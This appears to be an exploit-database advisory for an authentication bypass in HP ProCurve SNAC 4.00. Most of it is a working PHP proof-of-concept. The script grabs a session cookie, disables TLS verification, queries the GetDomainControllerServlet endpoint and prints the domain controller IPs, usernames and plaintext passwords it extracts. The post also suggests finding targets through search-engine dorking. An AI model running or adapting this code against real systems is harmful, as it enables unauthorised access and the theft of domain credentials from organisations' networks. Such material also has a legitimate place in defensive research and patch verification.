============================================================================================================================================= | # Title : HP ProCurve 4.00 Credential Dumping Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Performing a Credential Dumping attack against vulnerable HP ProCurve SNAC systems. Bypass Authentication in HP ProCurve SNAC to Extract Domain Controller Data (Related : https://packetstorm.news/files/id/180690/ Linked CVE numbers: ) . [+] save code as poc.php. [+] Set target : line 86 [+] PayLoad : target = $target; $this->port = $port; } private function sendRequest($url, $cookies = "") { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); if (!empty($cookies)) { curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookies"]); } $response = curl_exec($ch); curl_close($ch); return $response; } public function getSession() { $response = $this->sendRequest("/RegWeb/html/snac/index.html"); preg_match_all('/Set-Cookie: (.*?);/i', $response, $matches); return isset($matches[1]) ? implode("; ", $matches[1]) : null; } public function getDomainInfo($session) { $response = $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", $session); return (strpos($response, 'domainName') !== false) ? $response : null; } public function parseDomainData($xmlData) { $credentials = []; $xml = simplexml_load_string($xmlData); if ($xml && isset($xml->Controllers->Domain)) { foreach ($xml->Controllers->Domain as $domain) { $credentials[] = [ 'ip' => (string) $domain->domainControllerIP, 'port' => (string) $domain->port, 'service' => (string) $domain->connType, 'user' => (string) $domain->userName, 'password' => (string) $domain->password ]; } } return $credentials; } public function exploit() { echo "[*] Trying to get session...\n"; $session = $this->getSession(); if (!$session) { echo "[-] Failed to obtain session. Target may not be vulnerable.\n"; return; } echo "[*] Exploiting authentication bypass...\n"; $domainInfo = $this->getDomainInfo($session); if (!$domainInfo) { echo "[-] Exploit failed. Target may not be vulnerable.\n"; return; } echo "[*] Parsing extracted data...\n"; $credentials = $this->parseDomainData($domainInfo); if (empty($credentials)) { echo "[!] No domain controllers found.\n"; return; } echo "[+] Credentials found:\n"; foreach ($credentials as $cred) { echo "Domain Controller: {$cred['ip']}:{$cred['port']} ({$cred['service']})\n"; echo "Username: {$cred['user']}\n"; echo "Password: {$cred['password']}\n"; echo "-----------------------------------------\n"; } } } $exploit = new HPSNACExploit("target.com"); $exploit->exploit(); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================